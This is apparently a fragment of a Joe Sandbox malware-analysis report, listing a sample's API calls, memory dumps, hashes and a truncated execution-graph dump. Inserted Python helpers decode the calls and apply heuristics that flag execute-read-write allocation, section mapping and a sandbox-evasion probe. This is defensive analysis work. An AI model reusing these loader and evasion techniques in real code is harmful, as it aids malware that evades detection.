                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
                            • Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
                            • Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F
                            APIs
                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FC0F8
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006F9000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_6f9000_ashcvvs.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction ID: 9e9c26a5fcbfe93d46a094477a199653925f0e2db0de5bb061c7412d1a183fdc
                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                            • Instruction Fuzzy Hash: 5E112B79A00208EFDB01DF98CA85E98BBF5AF08350F058095FA489B362D371EA50DF80
                            APIs
                            • Sleep.KERNELBASE(00001388), ref: 00401949
                              • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                              • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_ashcvvs.jbxd
                            Similarity
                            • API ID: CreateDuplicateObjectSectionSleep
                            • String ID:
                            • API String ID: 4152845823-0
                            • Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
                            • Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
                            • Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F
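The argument columns in the APIs lines of this report are raw hexadecimal stack values. The Python below is an added example, not part of the report or of the sample: it decodes those constants for the calls listed in this section (VirtualAlloc, CreateToolhelp32Snapshot, SetErrorMode, NtDuplicateObject, NtCreateSection) and applies four heuristic rules whose names are mine. The sample lines are copied from the listings above. Caveats: Joe Sandbox prints stack slots, so only APIs whose listed values line up with the documented prototype are decoded (VirtualProtect at 0042347D, listed with 00000040 in the first slot, is deliberately left out); the SetErrorMode rule only matches the SetErrorMode(0x400) then SetErrorMode(0) pair, since the known sandbox probe compares the second call's return value with the mode set by the first, which a call listing cannot show.

```python
"""Decode the hexadecimal argument columns of a Joe Sandbox "APIs" listing and
flag the loader behaviours they imply. Added example, not part of the report:
the sample lines are copied from this section, the rule names are my own."""
import re
from dataclasses import dataclass

# Copied from the process 5 listings above.
SAMPLE_LINES = """\
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006D024D
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006FC410
• Module32First.KERNEL32(00000000,00000224), ref: 006FC430
• SetErrorMode.KERNELBASE(00000400,?,?,006D0223,?,?), ref: 006D0E19
• SetErrorMode.KERNELBASE(00000000,?,?,006D0223,?,?), ref: 006D0E1E
• Sleep.KERNELBASE(00001388), ref: 00401949
  • Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
  • Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006FC0F8
"""

PAGE = {0x1: "PAGE_NOACCESS", 0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE", 0x8: "PAGE_WRITECOPY",
        0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
        0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
TH32CS = {0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
SEM = {0x1: "SEM_FAILCRITICALERRORS", 0x2: "SEM_NOGPFAULTERRORBOX", 0x400: "SEM_NOOPENFILEERRORBOX"}
SECTION = {0x2: "SECTION_MAP_WRITE", 0x4: "SECTION_MAP_READ", 0x8: "SECTION_MAP_EXECUTE"}
SEC = {0x800000: "SEC_RESERVE", 0x1000000: "SEC_IMAGE", 0x8000000: "SEC_COMMIT"}
DUP = {0x1: "DUPLICATE_CLOSE_SOURCE", 0x2: "DUPLICATE_SAME_ACCESS"}

# Parameter names per documented prototype; a (name, table) pair marks a bitmask to decode.
SIGNATURES = {
    "VirtualAlloc": ["lpAddress", "dwSize", ("flAllocationType", MEM), ("flProtect", PAGE)],
    "CreateToolhelp32Snapshot": [("dwFlags", TH32CS), "th32ProcessID"],
    "SetErrorMode": [("uMode", SEM)],
    "Sleep": ["dwMilliseconds"],
    "NtCreateSection": ["SectionHandle", ("DesiredAccess", SECTION), "ObjectAttributes",
                        "MaximumSize", ("SectionPageProtection", PAGE),
                        ("AllocationAttributes", SEC), "FileHandle"],
    "NtDuplicateObject": ["SourceProcessHandle", "SourceHandle", "TargetProcessHandle",
                          "TargetHandle", "DesiredAccess", "HandleAttributes", ("Options", DUP)],
}

LINE_RE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    args: list  # int per argument, None where the listing shows "?"
    ref: int


def parse_calls(text):
    """Pull every 'Api.Module(args), ref: addr' entry out of a listing, in order."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [None if a.strip() == "?" else int(a, 16) for a in m["args"].split(",")]
            calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
    return calls


def arg(call, n): return call.args[n] if n < len(call.args) else None
def fmt(value): return "?" if value is None else hex(value)


def flags(value, table):
    """Name the set bits of a mask; unknown bits stay as hex so nothing is hidden."""
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(bit for bit in table if value & bit)
    if rest or not names:
        names.append(hex(rest))
    return "|".join(names)


def describe(call):
    """Render a call with named, decoded arguments; APIs without a signature keep raw hex."""
    spec = SIGNATURES.get(call.api)
    if spec is None:
        return f"{call.api}({','.join(fmt(a) for a in call.args)})"
    parts = []
    for entry, value in zip(spec, call.args):
        name, table = entry if isinstance(entry, tuple) else (entry, None)
        parts.append(f"{name}={fmt(value) if table is None else flags(value, table)}")
    return f"{call.api}({', '.join(parts)})"


def analyze(text):
    """Return (decoded call strings, sorted behaviour flags) for one listing."""
    calls = parse_calls(text)
    found = set()
    for i, c in enumerate(calls):
        if c.api == "VirtualAlloc" and (arg(c, 3) or 0) & 0x40:
            found.add("rwx-allocation")  # fresh RWX memory, the usual unpack target
        if c.api == "CreateToolhelp32Snapshot" and (arg(c, 0) or 0) & 0x8 and any(
                n.api.startswith("Module32First") for n in calls[i + 1:i + 3]):
            found.add("module-enumeration")  # walks the loaded-module list
        if c.api == "SetErrorMode" and arg(c, 0) == 0x400:
            later = [n for n in calls[i + 1:] if n.api == "SetErrorMode"]
            if later and arg(later[0], 0) == 0:
                found.add("seterrormode-probe")  # SetErrorMode(0x400) then SetErrorMode(0)
        if (c.api == "NtCreateSection" and (arg(c, 5) or 0) & 0x8000000
                and arg(c, 4) == 0x4 and arg(c, 6) == 0):
            found.add("pagefile-backed-rw-section")  # SEC_COMMIT, RW, no backing file
    return [describe(c) for c in calls], sorted(found)
```

Running `analyze(SAMPLE_LINES)` on the copied lines yields, among others, `VirtualAlloc(lpAddress=0x0, dwSize=?, flAllocationType=MEM_COMMIT, flProtect=PAGE_EXECUTE_READWRITE)` for the call at 006FC0F8 and `NtCreateSection(... SectionPageProtection=PAGE_READWRITE, AllocationAttributes=SEC_COMMIT, FileHandle=0x0)` for 004015FD, and all four rule names fire. The rules are deliberately narrow: each needs the exact constants seen here, so a benign program that enumerates modules without the SetErrorMode pair or the RWX allocation trips only one of them.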
                            APIs
                            • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,0042840C), ref: 004236AD
                            • OpenJobObjectA.KERNEL32(00000000,00000000,00428418), ref: 004236BA
                            • GetShortPathNameA.KERNEL32(00000000,?,00000000), ref: 004236C9
                            • Sleep.KERNEL32(00000000), ref: 004236D0
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: CalendarInfoNameObjectOpenPathShortSleep
                            • String ID: -
                            • API String ID: 3454512315-2547889144
                            • Opcode ID: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction ID: deacb889439696245f735b3f4471453babfeec7347a63c5168fd63d97d027ef3
                            • Opcode Fuzzy Hash: 51237ded8cffff5c661eebe9a307697b28ab80f9e6e32791c6b23dd8faaea119
                            • Instruction Fuzzy Hash: 7921A771A00128EBC7319F15EC859AE7778EB85715F4080ADE659A7241C73C4A86CF6C
                            APIs
                            • GetModuleHandleW.KERNEL32(0043A3B0), ref: 00423551
                            • GetProcAddress.KERNEL32(00000000,0042C638), ref: 0042358E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: $VirtualProtect
                            • API String ID: 1646373207-947944765
                            • Opcode ID: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction ID: d0582955cadd0fc5f4b94350803a6a31df697eece703d4cb31990996f5db6057
                            • Opcode Fuzzy Hash: 44762ff7a82ffd8c5c1d5e0c0204e9bd3952b0c34b1168cc3fd0d8398fe7d883
                            • Instruction Fuzzy Hash: 8E31531569C3C0D8E331CBA8BC857297B62AB15B14F54347AD9848B2F1D3FA056A836F
                            APIs
                            • GetFullPathNameW.KERNEL32(0042844C,00000000,?,00000000), ref: 00423744
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00423760
                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 0042377E
                            • SetFileShortNameA.KERNEL32(00000000,00428480), ref: 0042378A
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: Name$CreateEnvironmentFileFreeFullHeapPathShortStrings
                            • String ID:
                            • API String ID: 4071102102-0
                            • Opcode ID: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction ID: 4f65d5ff727ea9b5f32b9490f161a63e31010cc474a4420f8d895bd29f22500d
                            • Opcode Fuzzy Hash: 741c1bccab81f8b294f72623694b2b6f52fb331087fe6a6da8c1225e30d228ee
                            • Instruction Fuzzy Hash: B101B1B1704124AFCB20AF69BC89D6B77BCE78971AB80503FF501D2150DA3C1945CB6E
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_416000_ashcvvs.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction ID: 79eb0d46623e3e840f5a8a74d676871430ce86260699b964cc8067b3add82cac
                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                            • Instruction Fuzzy Hash: 8A117232600159BBCF225E84EC01CEE3F62FB59754B998416FA1955130C63ACAB2AB89
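Every "Memory Dump Source" entry above names a .sdmp file whose dotted fields describe the region the code was dumped from. The Python below is an added example, not part of the report: it parses those names and sorts the regions into three buckets. The field layout is my reading of the names, not Joe Sandbox documentation: field 5 matches the Win32 page-protection constants and field 7 the MEMORY_BASIC_INFORMATION Type values (0x20000 MEM_PRIVATE, 0x1000000 MEM_IMAGE), which agrees with the report's own "based on PE" flag for the 6D0000 and 400000 dumps; fields 6 and 8 are left undecoded. The bucket names are mine. The names below are copied from this report.

```python
"""Parse the .sdmp memory-dump names in this report and classify the regions they
were taken from. Added example; the names are copied from the report. Assumed field
layout (my reading, not Joe Sandbox documentation): process index . dump kind .
dump id . base address . page protection . (undecoded) . region type . (undecoded)"""
import re
from dataclasses import dataclass

REPORT_DUMPS = [
    "00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp",
    "00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp",
    "00000005.00000002.2060637436.0000000000416000.00000020.00000001.01000000.00000005.sdmp",
    "00000005.00000002.2060616767.0000000000400000.00000040.00000001.01000000.00000005.sdmp",
    "00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp",
    "00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp",
    "00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp",
]

MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_BITS = 0xF0   # PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY
WRITE_BITS = 0xCC  # PAGE_READWRITE, PAGE_WRITECOPY and their execute variants

SDMP_RE = re.compile(r"^(?P<proc>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.(?P<dump_id>\d+)\."
                     r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.[0-9a-f]{8}\."
                     r"(?P<mtype>[0-9a-f]{8})\.[0-9a-f]{8}\.sdmp$", re.IGNORECASE)


@dataclass(frozen=True)
class Region:
    process_index: int
    base: int
    protect: int
    mem_type: int

    @property
    def executable(self): return bool(self.protect & EXEC_BITS)
    @property
    def writable(self): return bool(self.protect & WRITE_BITS)
    @property
    def type_name(self): return MEM_TYPE.get(self.mem_type, hex(self.mem_type))


def parse_sdmp_name(name):
    """Split a dump file name into the fields assumed above; reject anything else."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return Region(int(m["proc"], 16), int(m["base"], 16), int(m["protect"], 16), int(m["mtype"], 16))


def classify(region):
    """Bucket names are my own. Image memory that is both writable and executable means
    the mapped PE's section rights were changed; private executable memory is code with
    no file behind it (unpacked or injected); everything else is ordinary."""
    if region.mem_type == 0x1000000 and region.executable and region.writable:
        return "image-rwx"
    if region.mem_type == 0x20000 and region.executable:
        return "private-executable"
    return "ordinary"


def triage(names):
    """One (process index, base, type, bucket) row per dump name."""
    rows = []
    for name in names:
        r = parse_sdmp_name(name)
        rows.append((r.process_index, hex(r.base), r.type_name, classify(r)))
    return rows
```

On the names from this report, `triage(REPORT_DUMPS)` puts the 6D0000 and 6F9000 dumps of process 5 into `private-executable` (read-write-execute memory with no image behind it, which is where the VirtualAlloc, Toolhelp and SetErrorMode code above lives) and the 400000 dump into `image-rwx` (the PE base mapped with PAGE_EXECUTE_READWRITE rather than the read-only header protection the loader normally leaves); the process 6 image regions and the 416000 section come out `ordinary`.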

                            Execution Graph

                            Execution Coverage:8.2%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:3.1%
                            Total number of Nodes:130
                            Total number of Limit Nodes:3
                            • Graph image not reproduced. Nodes with API calls: 7ff7dad8e425 and 7ff7dad67ce1 ExitProcess; 7ff7dad67de4 and 7ff7dad68006 GetProcAddress (7ff7dad67de4 is called repeatedly, shown as "2 API calls", from 7ff7daf2dfcd, 7ff7daf2f771, 7ff7dad638f3, 7ff7dadf8f0c and 7ff7dad636b5); 7ff7dad61037 __set_app_type; 7ff7dad611ed _initterm; 7ff7dad64c10, 7ff7dad68210, 7ff7dad6846c, 7ff7dad682ee and 7ff7dad68324 VirtualAlloc; 7ff7dad64d6a CreateThread; 7ff7dad64cd6 TlsSetValue.

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID: (IkY
                            • API String ID: 4275171209-2939663806
                            • Opcode ID: 654375bd2adb7c4ce6cfcce837ff9cac6b0cc9778b80684c7d8a0c1e9c6bb85e
                            • Instruction ID: ceceb32fe45d391f18339da1ea83bae42b48b752a83a3a171afab2d853b24054
                            • Opcode Fuzzy Hash: 654375bd2adb7c4ce6cfcce837ff9cac6b0cc9778b80684c7d8a0c1e9c6bb85e
                            • Instruction Fuzzy Hash: 05412D22B3486103976C8579AC23E7A99D397D57A4B94E33EEA1BCBFE4D92CC4010B04

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 01481c68a23a2812913d17c9761d3a9cda6e291ecc39a4a3494c41bc91cfc42a
                            • Instruction ID: 5aec3049c65b882a7dbf2186382ce4ac530d964ca79f73d5a0a422fb71adc99a
                            • Opcode Fuzzy Hash: 01481c68a23a2812913d17c9761d3a9cda6e291ecc39a4a3494c41bc91cfc42a
                            • Instruction Fuzzy Hash: A2314C33B3486143E36CC639A822F7A9AD3D7A5794F98923EDA1AC7FD4C52CD0014B04

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: _initterm
                            • String ID:
                            • API String ID: 4163712557-0
                            • Opcode ID: 2c5eb427298b35530c371963756332f62d4f86dff1dd143fbbe62a8679ce9941
                            • Instruction ID: 99589a605b3d3a3c1e882080a79de0be6cab163f97762ca7e696ae7185d7d853
                            • Opcode Fuzzy Hash: 2c5eb427298b35530c371963756332f62d4f86dff1dd143fbbe62a8679ce9941
                            • Instruction Fuzzy Hash: B631A265E09B0A88FB40AB56E8847ADB3A1BB48B84FC044F7DD0C473A6DE7CE4418320

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocCreateThreadVirtual
                            • String ID:
                            • API String ID: 3065189322-0
                            • Opcode ID: f4da127b37b09146a3287b4c1fc7b5c66ded5ad9a82646e24f1534fe06c91efc
                            • Instruction ID: 3c0dcb3af1bc07d3e6b5ac337e3db34e12d80deac97b0036c527addb80761fd8
                            • Opcode Fuzzy Hash: f4da127b37b09146a3287b4c1fc7b5c66ded5ad9a82646e24f1534fe06c91efc
                            • Instruction Fuzzy Hash: 0B314776509F8981EB40AB15F44036EB3A4F789B84FE04176EA8D0376ACF7CD555C760

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 182e7078fdde7105ded17e1f2c3a8597fbe191e7521f7cc7b5a51861ea6cf64f
                            • Instruction ID: 4d6b210488d2a0494db8403cbcc60952b0d47dc6973e4294be9e1e50ef22a9af
                            • Opcode Fuzzy Hash: 182e7078fdde7105ded17e1f2c3a8597fbe191e7521f7cc7b5a51861ea6cf64f
                            • Instruction Fuzzy Hash: 490182A2729F8086EA60DB65B49411EABA1F7C9BE8F541234EF9E877D9CA3CD1404700
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2421849383.00007FF7DAD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7DAD60000, based on PE: true
                            • Associated: 00000006.00000002.2421822097.00007FF7DAD60000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422115971.00007FF7DAF38000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422159840.00007FF7DAF45000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAF5D000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422277063.00007FF7DAFBF000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000006.00000002.2422498167.00007FF7DAFC3000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_7ff7dad60000_70C1.jbxd
                            Similarity
                            • API ID: AddressProc
                            • String ID: @
                            • API String ID: 190572456-2766056989
                            • Opcode ID: 98dab1cb01b021df85c4e2773f3ef182a83cdd50f2952866cd6c392297a248ff
                            • Instruction ID: c6ca9b9157182e4e4820a26641843ac100b084b8c98e365f39f93d06336abb42
                            • Opcode Fuzzy Hash: 98dab1cb01b021df85c4e2773f3ef182a83cdd50f2952866cd6c392297a248ff
                            • Instruction Fuzzy Hash: FF5103B2619BC481EE50CB65B45036BB7A1F7897E0F944636EEDD47BA9CF2CC0408B00

                            Execution Graph

                            Execution Coverage: 10%
                            Dynamic/Decrypted Code Coverage: 100%
                            Signature Coverage: 0.3%
                            Total number of Nodes: 992
                            Total number of Limit Nodes: 30
4680 7ff65b0387d0 3 API calls 4677->4680 4680->4726 4681 7ff65b043fe6 4684 7ff65b044047 4681->4684 4685 7ff65b044472 4681->4685 4682 7ff65b043fcb 4683 7ff65b0387d0 3 API calls 4682->4683 4683->4726 4687 7ff65b044068 4684->4687 4688 7ff65b04406d 4684->4688 4686 7ff65b04449b 4685->4686 4690 7ff65b044496 4685->4690 4691 7ff65b0387d0 3 API calls 4686->4691 4692 7ff65b04416d 4687->4692 4693 7ff65b044185 4687->4693 4689 7ff65b0387d0 3 API calls 4688->4689 4689->4726 4694 7ff65b044683 4690->4694 4695 7ff65b044513 4690->4695 4691->4726 4696 7ff65b0387d0 3 API calls 4692->4696 4697 7ff65b044279 4693->4697 4698 7ff65b0441a9 4693->4698 4703 7ff65b0446a7 4694->4703 4704 7ff65b0446ac 4694->4704 4701 7ff65b0387d0 3 API calls 4695->4701 4695->4726 4696->4726 4699 7ff65b044287 4697->4699 4700 7ff65b0442a5 4697->4700 4705 7ff65b03e95a 3 API calls 4698->4705 4698->4726 4706 7ff65b03e95a 3 API calls 4699->4706 4770 7ff65b042a70 4700->4770 4701->4695 4709 7ff65b044857 4703->4709 4710 7ff65b044744 4703->4710 4708 7ff65b0387d0 3 API calls 4704->4708 4705->4726 4706->4726 4707 7ff65b0442b6 4713 7ff65b044300 4707->4713 4723 7ff65b0442fb 4707->4723 4708->4726 4711 7ff65b044970 4709->4711 4712 7ff65b044865 4709->4712 4716 7ff65b0387d0 3 API calls 4710->4716 4714 7ff65b04499c 4711->4714 4715 7ff65b04497e 4711->4715 4717 7ff65b03e95a 3 API calls 4712->4717 4712->4726 4719 7ff65b0387d0 3 API calls 4713->4719 4720 7ff65b044adb 4714->4720 4721 7ff65b0449aa 4714->4721 4718 7ff65b03e95a 3 API calls 4715->4718 4716->4726 4717->4712 4718->4726 4719->4726 4727 7ff65b044abe 4720->4727 4758 7ff65b043930 4720->4758 4724 7ff65b03e95a 3 API calls 4721->4724 4721->4727 4725 7ff65b03e95a 3 API calls 4723->4725 4723->4726 4724->4727 4725->4726 4727->4726 4728 7ff65b044db9 4727->4728 4729 7ff65b044eb8 4727->4729 4728->4726 4730 7ff65b0387d0 3 API calls 4728->4730 4729->4726 4731 7ff65b0387d0 3 API calls 4729->4731 4730->4726 4731->4726 4733 